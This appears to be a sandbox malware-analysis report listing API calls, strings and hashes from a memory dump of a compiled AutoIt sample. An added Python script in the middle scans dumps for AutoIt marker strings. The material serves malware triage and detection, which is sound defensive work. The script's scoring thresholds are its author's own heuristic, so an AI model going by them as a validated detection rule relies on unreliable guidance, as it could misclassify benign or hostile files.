                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E67A7E
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E67AAE
                                          • GetStockObject.GDI32(00000011), ref: 00E67AB9
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E67AC4
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E67ACE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: ec9425e2aa36b6cf5d7431807d73543de8a09b5fd0d2a000a6e2420874503bfd
                                          • Instruction ID: 2cca897b3cef091b365aba0c7a9138eeb71eab0cb026d05245c960759d9a5c34
                                          • Opcode Fuzzy Hash: ec9425e2aa36b6cf5d7431807d73543de8a09b5fd0d2a000a6e2420874503bfd
                                          • Instruction Fuzzy Hash: B3A17E71A40219BFEB14DBA5DC4AFABBBB9EB44714F008214FA14B72E0D774AD44CB60
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E5AF89
                                          • GetDriveTypeW.KERNEL32(?,00E7FAC0,?,\\.\,00E7F910), ref: 00E5B066
                                          • SetErrorMode.KERNEL32(00000000,00E7FAC0,?,\\.\,00E7F910), ref: 00E5B1C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: 23b683f2819d6fd9d35541e75171565e745685fd5ae8af153459ba5915856723
                                          • Instruction ID: 5b5149b183a0885d2dde94f2633c1930e8811903d2edff51cf2a29a2dfc4f6ee
                                          • Opcode Fuzzy Hash: 23b683f2819d6fd9d35541e75171565e745685fd5ae8af153459ba5915856723
                                          • Instruction Fuzzy Hash: C351E930645705DB8B40DB10CA629FE73B0EB19347724A826FD0ABB1D0CB35AD49DB62
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          • Opcode ID: f2e932bc22e209e10c62593904a164d8227b99ceda793c0f61a6813567f76be0
                                          • Instruction ID: f1f6e903931bdd9ce239672b40fbebb1a2f2e5421742f363de64dfb3b4ee6508
                                          • Opcode Fuzzy Hash: f2e932bc22e209e10c62593904a164d8227b99ceda793c0f61a6813567f76be0
                                          • Instruction Fuzzy Hash: 9D811A70600329AACB24AF60DD92FFE77A8EF15700F099025FB45BA582EB60DA55C271
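The directive keywords above (#OnAutoItStartRegister, #include-once, #notrayicon, #requireadmin), the "AutoIt v3" / "AutoIt v3 GUI" window classes and the DriveGetType() bus-type table are the runtime strings behind the "compiled AutoIt script" verdict. The following scanner is an added triage example, not code from the Joe Sandbox report or from the AutoIt project: it looks for those markers in a memory dump or PE image. It assumes the strings are stored UTF-16LE (the report shows them passed to W-suffixed Win32 APIs and to __wcsnicmp), which is why an ASCII-only grep misses them, and its scoring thresholds are a heuristic chosen for this example rather than a published rule. The sample buffers are constructed inline.

```python
"""Added triage example (not from the Joe Sandbox report or the AutoIt
project): scan a memory dump or PE image for AutoIt v3 runtime markers.

Assumption (the author's): the markers live as UTF-16LE wide strings, so
both encodings are checked; the scoring thresholds are a heuristic."""

from __future__ import annotations

import sys
from dataclasses import dataclass, field

# Markers copied from the report's String IDs (window classes, script
# directives, parser error text).
AUTOIT_MARKERS: tuple[str, ...] = (
    "AutoIt v3",
    "AutoIt v3 GUI",
    "#OnAutoItStartRegister",
    "#include-once",
    "#notrayicon",
    "#requireadmin",
    "#pragma compile",
    "Bad directive syntax error",
    "Cannot parse #include",
    "Unterminated group of comments",
)

# DriveGetType() bus-type table from the GetDriveTypeW function's String ID
# (the report joins entries with '$'); the "\\.\" device prefix is left out.
DRIVE_TYPE_NAMES: tuple[str, ...] = tuple(
    "1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$"
    "PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$"
    "Unknown$Virtual$iSCSI".split("$")
)

ENCODINGS = ("utf-16-le", "ascii")


@dataclass
class ScanResult:
    # marker -> list of (encoding, byte offset) where it was found
    hits: dict[str, list[tuple[str, int]]] = field(default_factory=dict)
    # distinct drive-type names present in UTF-16LE form
    drive_type_names: int = 0

    def looks_like_autoit(self) -> bool:
        """Heuristic: the runtime's window class plus either a script
        directive keyword or most of the DriveGetType() table."""
        has_class = "AutoIt v3" in self.hits or "AutoIt v3 GUI" in self.hits
        has_directive = any(m.startswith("#") for m in self.hits)
        return has_class and (has_directive or self.drive_type_names >= 10)


def _find_all(haystack: bytes, needle: bytes) -> list[int]:
    """All (possibly overlapping) offsets of needle in haystack."""
    offsets, pos = [], haystack.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = haystack.find(needle, pos + 1)
    return offsets


def scan_autoit_markers(blob: bytes) -> ScanResult:
    result = ScanResult()
    for marker in AUTOIT_MARKERS:
        for enc in ENCODINGS:
            for off in _find_all(blob, marker.encode(enc)):
                result.hits.setdefault(marker, []).append((enc, off))
    # Short tokens such as "ATA" or "USB" are noisy as ASCII, so the drive
    # table is only counted in its UTF-16LE form.
    result.drive_type_names = sum(
        1 for name in DRIVE_TYPE_NAMES if blob.find(name.encode("utf-16-le")) != -1
    )
    return result


def _wide(s: str) -> bytes:
    """UTF-16LE with terminating NUL, as the W APIs expect."""
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed stand-in for a memory dump: filler bytes around wide strings.
SAMPLE_BLOB = (
    b"\x90" * 32 + _wide("AutoIt v3 GUI") + b"\x00" * 16
    + _wide("#OnAutoItStartRegister") + _wide("#notrayicon")
    + b"".join(_wide(n) for n in DRIVE_TYPE_NAMES) + b"\xcc" * 32
)
# Constructed benign buffer: the class name appears, but only as ASCII text.
BENIGN_BLOB = b"AutoIt v3 is mentioned in this ASCII readme only." + b"\x00" * 64


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    r = scan_autoit_markers(data)
    for marker, where in sorted(r.hits.items()):
        print(f"{marker!r}: {where[:3]}{' ...' if len(where) > 3 else ''}")
    print(f"drive-type names (UTF-16LE): {r.drive_type_names}/{len(DRIVE_TYPE_NAMES)}")
    print("compiled AutoIt runtime likely:", r.looks_like_autoit())
```

Run it against a `.sdmp` dump or the dropped executable (`python scan.py <file>`); without an argument it scans the constructed sample. Note that "AutoIt v3" is a prefix of "AutoIt v3 GUI", so both markers report the same offset, and that the class name on its own is deliberately not enough for a verdict, since it can appear in ordinary text.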
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 00E7AB99
                                          • SetTextColor.GDI32(?,?), ref: 00E7AB9D
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E7ABB3
                                          • GetSysColor.USER32(0000000F), ref: 00E7ABBE
                                          • CreateSolidBrush.GDI32(?), ref: 00E7ABC3
                                          • GetSysColor.USER32(00000011), ref: 00E7ABDB
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E7ABE9
                                          • SelectObject.GDI32(?,00000000), ref: 00E7ABFA
                                          • SetBkColor.GDI32(?,00000000), ref: 00E7AC03
                                          • SelectObject.GDI32(?,?), ref: 00E7AC10
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E7AC2F
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E7AC46
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E7AC5B
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E7ACA7
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E7ACCE
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00E7ACEC
                                          • DrawFocusRect.USER32(?,?), ref: 00E7ACF7
                                          • GetSysColor.USER32(00000011), ref: 00E7AD05
                                          • SetTextColor.GDI32(?,00000000), ref: 00E7AD0D
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E7AD21
                                          • SelectObject.GDI32(?,00E7A869), ref: 00E7AD38
                                          • DeleteObject.GDI32(?), ref: 00E7AD43
                                          • SelectObject.GDI32(?,?), ref: 00E7AD49
                                          • DeleteObject.GDI32(?), ref: 00E7AD4E
                                          • SetTextColor.GDI32(?,?), ref: 00E7AD54
                                          • SetBkColor.GDI32(?,?), ref: 00E7AD5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 4e15e1fc00e42b153f3a976555745e3a86f3d050c5d1c2eb34d50b4afefe3209
                                          • Instruction ID: 359f018706656446009689ef5551cb2182d16f7361c720bb466f8840be8e6b47
                                          • Opcode Fuzzy Hash: 4e15e1fc00e42b153f3a976555745e3a86f3d050c5d1c2eb34d50b4afefe3209
                                          • Instruction Fuzzy Hash: E0614B71901218FFDF11DFA5DC48AAEBBB9FB48320F148125F919BB2A1D6719D80DB90
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E78D34
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E78D45
                                          • CharNextW.USER32(0000014E), ref: 00E78D74
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E78DB5
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E78DCB
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E78DDC
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E78DF9
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00E78E45
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E78E5B
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E78E8C
                                          • _memset.LIBCMT ref: 00E78EB1
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E78EFA
                                          • _memset.LIBCMT ref: 00E78F59
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E78F83
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E78FDB
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00E79088
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E790AA
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E790F4
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E79121
                                          • DrawMenuBar.USER32(?), ref: 00E79130
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00E79158
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          • Opcode ID: cb7fe1b27101353904978612540edabe7112dc4ceb95d22825485a2a9bc2426e
                                          • Instruction ID: 7d46272afb74177d15b03d809b82fc9bc0259d4f3bd8fe27b67cffca4fab9792
                                          • Opcode Fuzzy Hash: cb7fe1b27101353904978612540edabe7112dc4ceb95d22825485a2a9bc2426e
                                          • Instruction Fuzzy Hash: 86E1AF70901209AFDF20DF61CC88AEE7BB9EF14714F109156FA19BA291DB708A85CF60
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00E74C51
                                          • GetDesktopWindow.USER32 ref: 00E74C66
                                          • GetWindowRect.USER32(00000000), ref: 00E74C6D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E74CCF
                                          • DestroyWindow.USER32(?), ref: 00E74CFB
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E74D24
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E74D42
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E74D68
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00E74D7D
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E74D90
                                          • IsWindowVisible.USER32(?), ref: 00E74DB0
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E74DCB
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E74DDF
                                          • GetWindowRect.USER32(?,?), ref: 00E74DF7
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00E74E1D
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00E74E37
                                          • CopyRect.USER32(?,?), ref: 00E74E4E
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00E74EB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 58b4f19c800c35506e02243cd8312a3507c9e021e2a28237ed7ef4ff65f97822
                                          • Instruction ID: 8fd5372d34bf75d84d034196964f1c8b060e05fe14d546926f2a16dc191ed1c8
                                          • Opcode Fuzzy Hash: 58b4f19c800c35506e02243cd8312a3507c9e021e2a28237ed7ef4ff65f97822
                                          • Instruction Fuzzy Hash: CEB148B1604341AFDB04DF65C844B6ABBE4FF88714F00891DF599AB2A1D771EC44CBA1
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DF28BC
                                          • GetSystemMetrics.USER32(00000007), ref: 00DF28C4
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DF28EF
                                          • GetSystemMetrics.USER32(00000008), ref: 00DF28F7
                                          • GetSystemMetrics.USER32(00000004), ref: 00DF291C
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DF2939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DF2949
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DF297C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DF2990
                                          • GetClientRect.USER32(00000000,000000FF), ref: 00DF29AE
                                          • GetStockObject.GDI32(00000011), ref: 00DF29CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF29D5
                                            • Part of subcall function 00DF2344: GetCursorPos.USER32(?), ref: 00DF2357
                                            • Part of subcall function 00DF2344: ScreenToClient.USER32(00EB67B0,?), ref: 00DF2374
                                            • Part of subcall function 00DF2344: GetAsyncKeyState.USER32(00000001), ref: 00DF2399
                                            • Part of subcall function 00DF2344: GetAsyncKeyState.USER32(00000002), ref: 00DF23A7
                                          • SetTimer.USER32(00000000,00000000,00000028,00DF1256), ref: 00DF29FC
                                          Strings
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 1e110f73586b85e467b29922e01d3352b4b0f51a9db90186a2107ab07b9f01f5
                                          • Instruction ID: 3c4424c64281d302199b29de0377e139a678291c1dc8593d1e2696924c04966b
                                          • Opcode Fuzzy Hash: 1e110f73586b85e467b29922e01d3352b4b0f51a9db90186a2107ab07b9f01f5
                                          • Instruction Fuzzy Hash: 1FB18C71A0021AEFDB14DFA9DC45BBE7BB5FB08314F118229FA15A7290CB74D840CB60
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E740F6
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E741B6
                                          Strings
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 3974292440-719923060
                                          • Opcode ID: a5d3ea4e02d4980756c2343f5fc168bf39354e7c939debda42959d182b61374d
                                          • Instruction ID: 45de97f3574e97cbcbf9dab70c21a20cd6605f6c3f2cf23c906788a5d61cee22
                                          • Opcode Fuzzy Hash: a5d3ea4e02d4980756c2343f5fc168bf39354e7c939debda42959d182b61374d
                                          • Instruction Fuzzy Hash: E0A1A1706142059BCB14EF20C851ABAB7E5FF85314F11A968B99ABB2D2DB30EC45CB61
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00E65309
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00E65314
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00E6531F
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00E6532A
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00E65335
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00E65340
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00E6534B
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00E65356
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00E65361
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00E6536C
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00E65377
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00E65382
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00E6538D
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00E65398
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00E653A3
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00E653AE
                                          • GetCursorInfo.USER32(?), ref: 00E653BE
                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00E653E9
                                          Similarity
                                          • API ID: Cursor$Load$ErrorInfoLast
                                          • String ID:
                                          • API String ID: 3215588206-0
                                          • Opcode ID: 6b35c0c8dfc6bb3248544aea2ce2fd38fa5c4e46e8e9949db11dd0b954939dd8
                                          • Instruction ID: a5a38e1f9161f7fa1a3eaa43a74d0cc05cfeb0243e742c3ee80528958021dffc
                                          • Opcode Fuzzy Hash: 6b35c0c8dfc6bb3248544aea2ce2fd38fa5c4e46e8e9949db11dd0b954939dd8
                                          • Instruction Fuzzy Hash: F4419270E443196ADB109FBA9C4996FFFF8EF41B50F10452FE519E7290DAB8A400CE61
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E4AAA5
                                          • __swprintf.LIBCMT ref: 00E4AB46
                                          • _wcscmp.LIBCMT ref: 00E4AB59
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E4ABAE
                                          • _wcscmp.LIBCMT ref: 00E4ABEA
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00E4AC21
                                          • GetDlgCtrlID.USER32(?), ref: 00E4AC73
                                          • GetWindowRect.USER32(?,?), ref: 00E4ACA9
                                          • GetParent.USER32(?), ref: 00E4ACC7
                                          • ScreenToClient.USER32(00000000), ref: 00E4ACCE
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E4AD48
                                          • _wcscmp.LIBCMT ref: 00E4AD5C
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00E4AD82
                                          • _wcscmp.LIBCMT ref: 00E4AD96
                                            • Part of subcall function 00E1386C: _iswctype.LIBCMT ref: 00E13874
                                          Strings
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: fc21c78c1e9b551f86aa95ac04e1d241dc5736894ddaa4278838ded4ad01503e
                                          • Instruction ID: 2abe8ddd1e78fc092c5803ffd3f604b53910e62d78ec5432d3f7f10f5360235f
                                          • Opcode Fuzzy Hash: fc21c78c1e9b551f86aa95ac04e1d241dc5736894ddaa4278838ded4ad01503e
                                          • Instruction Fuzzy Hash: 70A1E171644206AFD718DF60D884BEAF7E8FF04329F085639F999E2190D730E945CB92
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00E4B3DB
                                          • _wcscmp.LIBCMT ref: 00E4B3EC
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E4B414
                                          • CharUpperBuffW.USER32(?,00000000), ref: 00E4B431
                                          • _wcscmp.LIBCMT ref: 00E4B44F
                                          • _wcsstr.LIBCMT ref: 00E4B460
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E4B498
                                          • _wcscmp.LIBCMT ref: 00E4B4A8
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E4B4CF
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E4B518
                                          • _wcscmp.LIBCMT ref: 00E4B528
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00E4B550
                                          • GetWindowRect.USER32(00000004,?), ref: 00E4B5B9
                                          Strings
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: 3977c633623ee2641c794003c9dd53e9d17e946338a3a371f61179096391bcce
                                          • Instruction ID: bcf505c981a01c8046c9f4d1ba5cc9ae4af8233941ac456b6a0f60c6b8a83d1e
                                          • Opcode Fuzzy Hash: 3977c633623ee2641c794003c9dd53e9d17e946338a3a371f61179096391bcce
                                          • Instruction Fuzzy Hash: B281C7710083059FDB04DF15E885FAAB7E8FF44318F04A56AFD85AA096DB34DD89CBA1
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • DragQueryPoint.SHELL32(?,?), ref: 00E7C917
                                            • Part of subcall function 00E7ADF1: ClientToScreen.USER32(?,?), ref: 00E7AE1A
                                            • Part of subcall function 00E7ADF1: GetWindowRect.USER32(?,?), ref: 00E7AE90
                                            • Part of subcall function 00E7ADF1: PtInRect.USER32(?,?,00E7C304), ref: 00E7AEA0
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E7C980
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E7C98B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E7C9AE
                                          • _wcscat.LIBCMT ref: 00E7C9DE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E7C9F5
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E7CA0E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E7CA25
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E7CA47
                                          • DragFinish.SHELL32(?), ref: 00E7CA4E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E7CB41
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
                                          • API String ID: 169749273-2073472848
                                          • Opcode ID: 32d41af1f6d9dc77f31641b2c8da1a5f4bc47e30b630122036bf0226cea209ee
                                          • Instruction ID: 89e2dd4d636dfb30d295e96572e3c142a5f4e36836ca282c9461fff940db0c00
                                          • Opcode Fuzzy Hash: 32d41af1f6d9dc77f31641b2c8da1a5f4bc47e30b630122036bf0226cea209ee
                                          • Instruction Fuzzy Hash: FC617D71508304AFC701DF64DC85DAFBBE8FF89710F00492EF695A61A1DB309A49CB62
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: 6320cded22f1471ab165a152262aecd5c2a1f2cbe91c78741ecfa8f4e2ecbd86
                                          • Instruction ID: cad4000429b91c96671ca03db9d03a0c01329fe0d8d5e724c703f5219444afc6
                                          • Opcode Fuzzy Hash: 6320cded22f1471ab165a152262aecd5c2a1f2cbe91c78741ecfa8f4e2ecbd86
                                          • Instruction Fuzzy Hash: 4631AF31A44309A6DB14FE60ED43EFE77A89F29750F606029F501790E2EFA1BE04C675
                                          APIs
                                          • LoadIconW.USER32(00000063), ref: 00E4C4D4
